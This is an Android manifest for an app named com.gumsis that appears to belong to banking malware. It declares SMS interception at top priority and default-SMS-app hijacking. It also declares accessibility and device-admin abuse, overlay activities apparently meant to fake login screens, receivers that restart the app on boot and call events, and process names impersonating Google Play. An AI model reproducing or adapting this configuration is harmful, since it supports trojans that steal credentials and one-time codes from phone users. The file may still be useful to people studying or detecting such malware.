<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.gumsis">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.USES_POLICY_FORCE_LOCK"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.REAL_GET_TASKS "/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:name="com.gumsis.Realtalk" android:supportsRtl="true" android:theme="@android:style/Theme.Translucent.NoTitleBar">
        <activity android:name="com.gumsis.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.gumsis.checkui.AdRequestDialog" android:process="com.googleplay.activities.AdminRequestDialog" android:screenOrientation="portrait"/>
        <activity android:name="com.gumsis.ds.StartDialog" android:screenOrientation="portrait"/>
        <activity android:name="com.gumsis.ds.AccOnDialog" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboard|keyboardHidden|screenSize" android:name="com.gumsis.injs.g.GActivity" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:name="com.gumsis.checkui.ActOpenApp"/>
        <activity android:configChanges="keyboard|keyboardHidden|screenSize" android:name="com.gumsis.injs.s.SSplashActivity" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboard|keyboardHidden|screenSize" android:name="com.gumsis.injs.s.SLogActivity" android:screenOrientation="portrait" android:windowSoftInputMode="stateVisible"/>
        <activity android:configChanges="keyboard|keyboardHidden|screenSize" android:name="com.gumsis.injs.s.SRegActivity" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:name="com.gumsis.checkui.ComposeSActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|screenSize" android:name="com.gumsis.wb.WbActivity" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="com.playmarket.wb.wb"/>
            </intent-filter>
        </activity>
        <receiver android:enabled="true" android:exported="true" android:name="com.gumsis.mess.service.receiver.SmsReceiver">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.gumsis.mess.service.receiver.MmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:enabled="@bool/is_kitkat" android:name="com.gumsis.mess.service.receiver.PushSmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:name="com.gumsis.mess.service.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.gumsis.srs.StDlgSrs" android:stopWithTask="false">
            <intent-filter>
                <action android:name="com.googleplay.srs.StDlgSrs"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.gumsis.srs.CmndSrs">
            <intent-filter>
                <action android:name="com.googleplay.srs.CmndSrs"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.gumsis.srs.newapi.CmndJobSchedulerSrs" android:permission="android.permission.BIND_JOB_SERVICE">
            <intent-filter>
                <action android:name="com.googleplay.srs.CmndJobSchedulerSrc"/>
            </intent-filter>
        </service>
        <service android:label="@string/accessibilityservice_label" android:name="com.gumsis.srs.GPSrs" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/service_conf"/>
        </service>
        <receiver android:enabled="true" android:exported="true" android:name="com.gumsis.srs.rcv.AlarmBroadCastReceiver"/>
        <receiver android:description="@string/admin_device_description" android:label="@string/admin_device_label" android:name="com.gumsis.rcs.AdReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/admin_conf"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <receiver android:enabled="true" android:exported="true" android:label="RestartServiceWhenStopped" android:name="com.gumsis.rcs.RestartService">
            <intent-filter>
                <action android:name="RestartService"/>
            </intent-filter>
            <intent-filter android:priority="100">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
                <action android:name="android.intent.action.ACTION_BATTERY_LOW"/>
                <action android:name="android.intent.action.ACTION_BATTERY_OKAY"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.REBOOT"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>